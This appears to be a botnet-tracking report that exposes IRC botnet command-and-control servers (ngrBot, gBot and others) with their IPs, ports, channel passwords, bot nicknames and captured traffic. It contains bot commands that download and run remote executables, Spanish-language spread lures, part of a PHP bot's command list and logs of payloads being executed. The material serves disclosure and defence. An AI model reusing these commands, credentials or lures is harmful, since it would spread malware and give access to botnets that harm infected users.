HTTP Query Text
sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1
sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1

Suspicious Actions Detected
Copies self to other locations
Creates autorun records
Injects code into other processes

exe file Download
hosting infos: http://whois.domaintools.com/199.168.139.53
74.63.232.209 (ngrBot hosted in United States, New York, Limestone Networks Inc)
Remote Host      Port Number
199.15.234.7     80
203.249.66.5     80
74.63.232.209    5236

PASS ROCKR
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |"
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD"
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected
ch1mb4.info (ngrBot hosted in United States, Herndon, Road Runner Holdco Llc)
Resolved: [ch1mb4.info] To [74.62.155.207]
C&C Server: 74.62.155.207:6060
Server Password:
Username: uamethp
Nickname: n{DE|XPa}uamethp
Channel: #hell (Password: secret)
Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt
hosting infos: http://whois.domaintools.com/74.62.155.207
64.186.134.161 (ngrBot 1.0.3 hosted in United States, Atlanta, Vpsland.com Llc)
Older version of ngrBot with the original manual included.

Remote Host       Port Number
199.15.234.7      80
64.186.134.161    7834

PASS puto
NICK n{US|XPa}civmqel
USER civmqel 0 0 :civmqel
JOIN #dr3 ngrBot
Now talking in #dr3
Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]
Topic By: [
83.170.89.35 (linux bots hosted in United Kingdom, London, Uk2 - Ltd)
<?
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password>              //login to the bot
 * .logout                       //logout of the bot
 * .die                          //kill the bot
 * .restart                      //restart the bot
 * .mail <to> <from> <subject> <msg>   //send an email
 * .dns <IP|HOST>                //dns lookup
 * .download <URL> <filename>    //download
94.102.0.165 (ngrBot hosted in Turkey, Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host     Port Number
199.15.234.7    80
94.102.0.165    4444

PASS pas217
JOIN #voLwy vol323
PONG :HTTP1.4
NICK n{US|XP-32a}mwwaozy
USER mwwaozy 0 * :mwwaozy
hosting infos: http://whois.domaintools.com/94.102.0.165
lalorlz1.info (ngrBot hosted in Germany, Weinstadt, Hetzner Online Ag)
Resolved: [lalorlz1.info] To [88.198.181.16]
Resolved: [lalorlz1.info] To [176.9.192.216]
rlz1jmv.info not active
C&C Server: 88.198.181.16:5236
PASS ROCKR
Server Password:
Username: raecpnp
Nickname: n{DE|XPa}raecpnp
Channel: #ROCK (Password: ngrBot)
Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira a miley cyrus desnuda y dopada en un hotel
93.95.99.87 (irc botnet hosted in Russian Federation, Moscow, Jsc Mediasoft Ekspert)
Remote Host    Port Number
93.95.99.87    1866

NICK n[USA|XP|COMPUTERNAME]pxzflri
USER hh "" "lol" :hh
Now talking in #!h!
Modes On: [ #!h! ] [ +smntu ]
.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/
hosting infos: http://whois.domaintools.com/93.95.99.87
irc.r00t.me.uk (gBot hosted in Seychelles, Ideal Solution Ltd)
Remote Host       Port Number
irc.r00t.me.uk    7007

PASS gBot
NICK n{USA|XP}eqqcbip
USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip

I don't have the exe to find more info, so try to find the channels yourself. This botnet is from the same guy as here: http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html
hosting infos: http://whois.domaintools.com/193.107.16.113
60.190.223.42 (irc botnet hosted in China, Zhejiang, Ninbo Lanzhong Network Ltd)
Remote Host      Port Number
199.15.234.7     80
70.38.98.236     80
70.38.98.237     80
60.190.223.42    5101

PASS hax0r
PRIVMSG #US! :[d="http://img102.herosh.com/2012/01/14/551459105.gif" s="65536 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/14/594572320.gif" s="61440 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" - Download retries: 0
PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/04/210592960.gif" s="27648 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\3.tmp"